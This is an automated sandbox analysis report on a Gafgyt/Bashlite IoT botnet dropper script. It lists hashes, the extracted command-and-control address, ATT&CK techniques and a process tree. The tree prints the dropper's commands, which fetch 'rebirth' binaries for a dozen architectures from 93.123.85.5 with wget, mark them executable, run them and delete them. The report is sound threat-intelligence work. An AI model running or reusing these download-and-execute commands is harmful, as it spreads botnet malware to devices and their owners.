gafgyt | d2d1c037dd179c345f4077b9b7ea69ed3cb625ebe7bcdcad6ce6a086e4719c95

Analysis

max time kernel
143s
max time network
156s
platform
debian-9_armhf
resource
debian9-armhf-20240611-en
resource tags

arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
submitted
15-12-2024 04:02

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

d2d1c037dd179c345f4077b9b7ea69ed3cb625ebe7bcdcad6ce6a086e4719c95.sh
Size

1KB
MD5

ea40c6fc574ca6806883d693a8afa0b8
SHA1

ffa5c5e27f079da0e2928b589cd629b24541e0f0
SHA256

d2d1c037dd179c345f4077b9b7ea69ed3cb625ebe7bcdcad6ce6a086e4719c95
SHA512

d548f484d081bcd697c3fc6f677bfdb1a41bfc1ea533d699f272ac73ddcb755489a25f2a9bc20ddae554cfa199dd4afab31c90af655ff3175acd15f529aca0a3

Score

10^/10

gafgyt botnet defense_evasion discovery

Malware Config

Extracted

Family

gafgyt

93.123.85.5:666

Signatures

Detected Gafgyt variant 1 IoCs

resource	yara_rule
behavioral2/files/fstream-1.dat	family_gafgyt

Gafgyt family
gafgyt
Gafgyt/Bashlite
IoT botnet with numerous variants first seen in 2014.
botnet gafgyt

File and Directory Permissions Modification 1 TTPs 13 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
675	chmod
701	chmod
710	chmod
742	chmod
776	chmod
759	chmod
768	chmod
691	chmod
717	chmod
722	chmod
727	chmod
732	chmod
750	chmod

Executes dropped EXE 1 IoCs

ioc	pid	Process
/tmp/rebirth.arm4	677	rebirth.arm4

Reads system routing table 1 TTPs 4 IoCs

Gets active network interfaces from /proc virtual filesystem.

discovery

Internet Connection Discovery

T1016.001

description	ioc	Process
File opened for reading	/proc/net/route	rebirth.arm4t
File opened for reading	/proc/net/route	rebirth.arm5
File opened for reading	/proc/net/route	rebirth.arm6
File opened for reading	/proc/net/route	rebirth.arm4

Reads system network configuration 1 TTPs 4 IoCs

Uses contents of /proc filesystem to enumerate network settings.

discovery

Internet Connection Discovery

T1016.001

description	ioc	Process
File opened for reading	/proc/net/route	rebirth.arm6
File opened for reading	/proc/net/route	rebirth.arm4
File opened for reading	/proc/net/route	rebirth.arm4t
File opened for reading	/proc/net/route	rebirth.arm5

System Network Configuration Discovery 1 TTPs 3 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
730	rm
726	wget
728	rebirth.mips

Writes file to tmp directory 12 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/rebirth.spc	wget
File opened for modification	/tmp/rebirth.arm4t	wget
File opened for modification	/tmp/rebirth.i686	wget
File opened for modification	/tmp/rebirth.mips	wget
File opened for modification	/tmp/rebirth.ppc	wget
File opened for modification	/tmp/rebirth.mpsl	wget
File opened for modification	/tmp/rebirth.x86	wget
File opened for modification	/tmp/rebirth.sh4	wget
File opened for modification	/tmp/rebirth.arm4	wget
File opened for modification	/tmp/rebirth.arm5	wget
File opened for modification	/tmp/rebirth.arm6	wget
File opened for modification	/tmp/rebirth.m68	wget

/tmp/d2d1c037dd179c345f4077b9b7ea69ed3cb625ebe7bcdcad6ce6a086e4719c95.sh
/tmp/d2d1c037dd179c345f4077b9b7ea69ed3cb625ebe7bcdcad6ce6a086e4719c95.sh
1⤵
PID:663
- /usr/bin/wget
  wget http://93.123.85.5/rebirth.arm4
  2⤵
  - Writes file to tmp directory
  PID:666
- /bin/chmod
  chmod +x rebirth.arm4
  2⤵
  - File and Directory Permissions Modification
  PID:675
- /tmp/rebirth.arm4
  ./rebirth.arm4
  2⤵
  - Executes dropped EXE
  - Reads system routing table
  - Reads system network configuration
  PID:677
- /bin/rm
  rm -rf rebirth.arm4
  2⤵
  PID:681
- /usr/bin/wget
  wget http://93.123.85.5/rebirth.arm4t
  2⤵
  - Writes file to tmp directory
  PID:683
- /bin/chmod
  chmod +x rebirth.arm4t
  2⤵
  - File and Directory Permissions Modification
  PID:691
- /tmp/rebirth.arm4t
  ./rebirth.arm4t
  2⤵
  - Reads system routing table
  - Reads system network configuration
  PID:693
- /bin/rm
  rm -rf rebirth.arm4t
  2⤵
  PID:696
- /usr/bin/wget
  wget http://93.123.85.5/rebirth.arm5
  2⤵
  - Writes file to tmp directory
  PID:697
- /bin/chmod
  chmod +x rebirth.arm5
  2⤵
  - File and Directory Permissions Modification
  PID:701
- /tmp/rebirth.arm5
  ./rebirth.arm5
  2⤵
  - Reads system routing table
  - Reads system network configuration
  PID:702
- /bin/rm
  rm -rf rebirth.arm5
  2⤵
  PID:705
- /usr/bin/wget
  wget http://93.123.85.5/rebirth.arm6
  2⤵
  - Writes file to tmp directory
  PID:707
- /bin/chmod
  chmod +x rebirth.arm6
  2⤵
  - File and Directory Permissions Modification
  PID:710
- /tmp/rebirth.arm6
  ./rebirth.arm6
  2⤵
  - Reads system routing table
  - Reads system network configuration
  PID:711
- /bin/rm
  rm -rf rebirth.arm6
  2⤵
  PID:714
- /usr/bin/wget
  wget http://93.123.85.5/rebirth.i686
  2⤵
  - Writes file to tmp directory
  PID:715
- /bin/chmod
  chmod +x rebirth.i686
  2⤵
  - File and Directory Permissions Modification
  PID:717
- /tmp/rebirth.i686
  ./rebirth.i686
  2⤵
  PID:718
- /bin/rm
  rm -rf rebirth.i686
  2⤵
  PID:720
- /usr/bin/wget
  wget http://93.123.85.5/rebirth.m68
  2⤵
  - Writes file to tmp directory
  PID:721
- /bin/chmod
  chmod +x rebirth.m68
  2⤵
  - File and Directory Permissions Modification
  PID:722
- /tmp/rebirth.m68
  ./rebirth.m68
  2⤵
  PID:723
- /bin/rm
  rm -rf rebirth.m68
  2⤵
  PID:725
- /usr/bin/wget
  wget http://93.123.85.5/rebirth.mips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:726
- /bin/chmod
  chmod +x rebirth.mips
  2⤵
  - File and Directory Permissions Modification
  PID:727
- /tmp/rebirth.mips
  ./rebirth.mips
  2⤵
  - System Network Configuration Discovery
  PID:728
- /bin/rm
  rm -rf rebirth.mips
  2⤵
  - System Network Configuration Discovery
  PID:730
- /usr/bin/wget
  wget http://93.123.85.5/rebirth.mpsl
  2⤵
  - Writes file to tmp directory
  PID:731
- /bin/chmod
  chmod +x rebirth.mpsl
  2⤵
  - File and Directory Permissions Modification
  PID:732
- /tmp/rebirth.mpsl
  ./rebirth.mpsl
  2⤵
  PID:733
- /bin/rm
  rm -rf rebirth.mpsl
  2⤵
  PID:736
- /usr/bin/wget
  wget http://93.123.85.5/rebirth.ppc
  2⤵
  - Writes file to tmp directory
  PID:738
- /bin/chmod
  chmod +x rebirth.ppc
  2⤵
  - File and Directory Permissions Modification
  PID:742
- /tmp/rebirth.ppc
  ./rebirth.ppc
  2⤵
  PID:743
- /bin/rm
  rm -rf rebirth.ppc
  2⤵
  PID:745
- /usr/bin/wget
  wget http://93.123.85.5/rebirth.spc
  2⤵
  - Writes file to tmp directory
  PID:747
- /bin/chmod
  chmod +x rebirth.spc
  2⤵
  - File and Directory Permissions Modification
  PID:750
- /tmp/rebirth.spc
  ./rebirth.spc
  2⤵
  PID:752
- /bin/rm
  rm -rf rebirth.spc
  2⤵
  PID:754
- /usr/bin/wget
  wget http://93.123.85.5/rebirth.x86
  2⤵
  - Writes file to tmp directory
  PID:755
- /bin/chmod
  chmod +x rebirth.x86
  2⤵
  - File and Directory Permissions Modification
  PID:759
- /tmp/rebirth.x86
  ./rebirth.x86
  2⤵
  PID:761
- /bin/rm
  rm -rf rebirth.x86
  2⤵
  PID:763
- /usr/bin/wget
  wget http://93.123.85.5/rebirth.sh4
  2⤵
  - Writes file to tmp directory
  PID:764
- /bin/chmod
  chmod +x rebirth.sh4
  2⤵
  - File and Directory Permissions Modification
  PID:768
- /tmp/rebirth.sh4
  ./rebirth.sh4
  2⤵
  PID:770
- /bin/rm
  rm -rf rebirth.sh4
  2⤵
  PID:772
- /usr/bin/wget
  wget http://93.123.85.5/rebirth.arm7
  2⤵
  PID:773
- /bin/chmod
  chmod +x rebirth.arm7
  2⤵
  - File and Directory Permissions Modification
  PID:776
- /tmp/rebirth.arm7
  ./rebirth.arm7
  2⤵
  PID:778
- /bin/rm
  rm -rf rebirth.arm7
  2⤵
  PID:779

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/rebirth.arm4

Filesize
108KB

MD5
b74f3701eeb8973108ae472f2819d0cb

SHA1
98bf303a7888507d583f4a8e4bad73774920b7c3

SHA256
b62a5dcd0a95f79ad425c6e2a6180e48ada7c566540902a70148165f4df32ec4

SHA512
8526e6a47c25af114a433a4ff49ab135066de835e86c2f36a1fb4e8a7b20b1b7688b588cc53e5e66749f566058e5df4cf54fc02bc726a5c40b6fe74671562b98

Download Submit

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads